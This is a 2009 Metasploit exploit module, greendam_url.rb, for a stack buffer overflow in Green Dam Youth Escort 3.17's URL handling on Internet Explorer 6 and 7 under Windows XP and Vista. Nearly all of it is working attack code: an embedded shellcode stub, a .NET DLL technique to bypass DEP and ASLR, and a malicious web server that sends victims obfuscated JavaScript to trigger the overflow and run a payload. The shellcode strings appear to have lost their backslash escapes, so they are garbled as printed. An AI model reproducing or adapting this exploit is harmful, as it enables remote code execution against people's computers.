greendam_url.rb.txt
Posted on 16 June 2009
## # greendam_url.rb # # Green Dam URL Processing Buffer Overflow exploit for the Metasploit Framework # # Green Dam Youth Escort 3.17 successfully exploited on the following platforms: # - Internet Explorer 6, Windows XP SP2 # - Internet Explorer 7, Windows XP SP3 # - Internet Explorer 7, Windows Vista SP1 # # .NET binary is used to bypass DEP and ASLR # # Trancer # http://www.rec-sec.com ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Green Dam URL Processing Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in Green Dam Youth Escort version 3.17 in the way it handles overly long URLs. By setting an overly long URL, an attacker can overrun a buffer and execute arbitrary code. This module uses the .NET DLL memory technique by Alexander Sotirov and Mark Dowd and should bypass DEP, NX and ASLR. }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer <mtrancer[at]gmail.com>' ], 'Version' => '$Revision:$', 'References' => [ ['URL', 'http://www.cse.umich.edu/~jhalderm/pub/gd/'], # Analysis of the Green Dam Censorware System ['URL', 'http://www.milw0rm.com/exploits/8938'], # Original exploit by seer[N.N.U] ['URL', 'http://taossa.com/archive/bh08sotirovdowd.pdf'], # .NET DLL memory technique ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1000, 'BadChars' => "x00", 'Compat' => { 'ConnectionType' => '-find', }, 'StackAdjustment' => -3500, # Temporary stub virtualalloc() + memcpy() payload to RWX page 'PrependEncoder' => "xe8x56x00x00x00x53x55x56x57x8bx6cx24x18x8bx45x3c"+ "x8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01xebxe3x32"+ "x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38xe0x74x07"+ "xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1x8bx5ax24"+ "x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01xe8"+ "xebx02x31xc0x5fx5ex5dx5bxc2x08x00x5ex6ax30x59x64"+ "x8bx19x8bx5bx0cx8bx5bx1cx8bx1bx8bx5bx08x53x68x54"+ "xcaxafx91xffxd6x6ax40x5ex56xc1xe6x06x56xc1xe6x08"+ "x56x6ax00xffxd0x89xc3xebx0dx5ex89xdfxb9xe8x03x00"+ "x00xfcxf3xa4xffxe3xe8xeexffxffxff" }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { }], ], 'DisclosureDate' => 'Jun 11 2009', 'DefaultTarget' => 0)) end def on_request_uri(cli, request) ibase = 0x24240000 vaddr = ibase + 0x2065 if (request.uri.match(/.dll$/i)) print_status("Sending DLL to #{cli.peerhost}:#{cli.peerport}...") return if ((p = regenerate_payload(cli)) == nil) # First entry points to the table of pointers vtable = [ vaddr + 4 ].pack("V") cbase = ibase + 0x2065 + (256 * 4) # Build a function table 255.times { vtable << [cbase].pack("V") } # Append the shellcode vtable << p.encoded send_response( cli, Rex::Text.to_dotnetmem(ibase, vtable), { 'Content-Type' => 'application/x-msdownload', 'Connection' => 'close', 'Pragma' => 'no-cache' } ) return end print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...") j_function = rand_text_alpha(rand(100)+1) j_url = rand_text_alpha(rand(100)+1) j_counter = rand_text_alpha(rand(30)+2) html = %Q|<html> <head> <script language="javascript"> function #{j_function}() { var #{j_url}=''; for(var #{j_counter}=1;#{j_counter}<=2035;#{j_counter}++) #{j_url}+='$'; window.location=#{j_url}+'.html'; } </script> </head> <body onload="#{j_function}()"> <object classid="#{get_resource + "/generic-" + Time.now.to_i.to_s + ".dll"}#GenericControl"> <object> </body> </html> | # Transmit the compressed response to the client send_response(cli, html, { 'Content-Type' => 'text/html' }) # Handle the payload handler(cli) end end
